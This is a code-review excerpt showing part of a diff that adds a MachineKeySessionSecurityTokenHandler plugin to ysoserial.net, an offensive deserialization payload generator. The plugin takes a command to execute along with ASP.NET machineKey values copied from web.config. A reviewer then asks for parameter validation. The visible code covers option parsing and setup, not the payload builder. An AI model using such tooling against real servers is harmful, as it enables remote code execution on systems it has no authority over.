ysoserial/Plugins/MachineKeySessionSecurityTokenHandlerPlugin.cs

```diff
@@ -0,0 +1,146 @@
+**/
+
+namespace ysoserial.Plugins
+{
+    public class MachineKeySessionSecurityTokenHandlerPlugin : IPlugin
+    {
+        static string command = "";
+        static bool test = false;
+        static bool minify = false;
+        static bool useSimpleType = true;
+        static string validationKey = "";
+        static string decryptionKey = "";
+        static string validationAlg = "HMACSHA1";
+        static string decryptionAlg = "AES";
+        static string[] purposes = { "System.IdentityModel.Services.MachineKeyTransform" };
+
+        static OptionSet options = new OptionSet()
+            {
+                {"c|command=", "the command to be executed e.g. \"cmd /c calc\"", v => command = v },
+                {"t|test", "In this scenario, the test mode should not be applied, as the sink point relies on the web environment. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
+                {"ust|usesimpletype", "This is to remove additional info only when minifying and FormatterAssemblyStyle=Simple. Default: true", v => useSimpleType =  v != null },
+                {"vk|validationKey=", "Enter the validationKey from the web.config", v => validationKey = v },
+                {"ek|decryptionKey=", "Enter the decryptionKey from the web.config", v => decryptionKey = v },
+                {"va|validationAlg=", "Enter the validation from the web.config. Default: HMACSHA1. e.g: HMACSHA1/HMACSHA256/HMACSHA384/HMACSHA512", v => validationAlg = v },
+                {"da|decryptionAlg=", "Enter the validation from the web.config. Default: AES. e.g: AES/DES/3DES", v => decryptionAlg = v }
+            };
+
+        public string Name()
+        {
+            return "MachineKeySessionSecurityTokenHandler";
+        }
+
+        public string Description()
+        {
+            return "Generates XML payload for the MachineKeySessionSecurityTokenHandler class";
+        }
+
+        public string Credit()
+        {
+            return "L@2uR1te";
+        }
+
+        public OptionSet Options()
+        {
+            return options;
+        }
+
+        public object Run(string[] args)
+        {
+            InputArgs inputArgs = new InputArgs();
+            List<string> extra;
+            try
+            {
+                extra = options.Parse(args);
+                inputArgs.Cmd = command;
+                inputArgs.Minify = minify;
+                inputArgs.UseSimpleType = useSimpleType;
+                inputArgs.Test = test;
+            }
+            catch (OptionException e)
+            {
+                Console.Write("ysoserial: ");
+                Console.WriteLine(e.Message);
+                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
+                System.Environment.Exit(-1);
+            }
+
```

Comment:
Please add some validations to ensure the required parameter such as validationkey are not null or empty.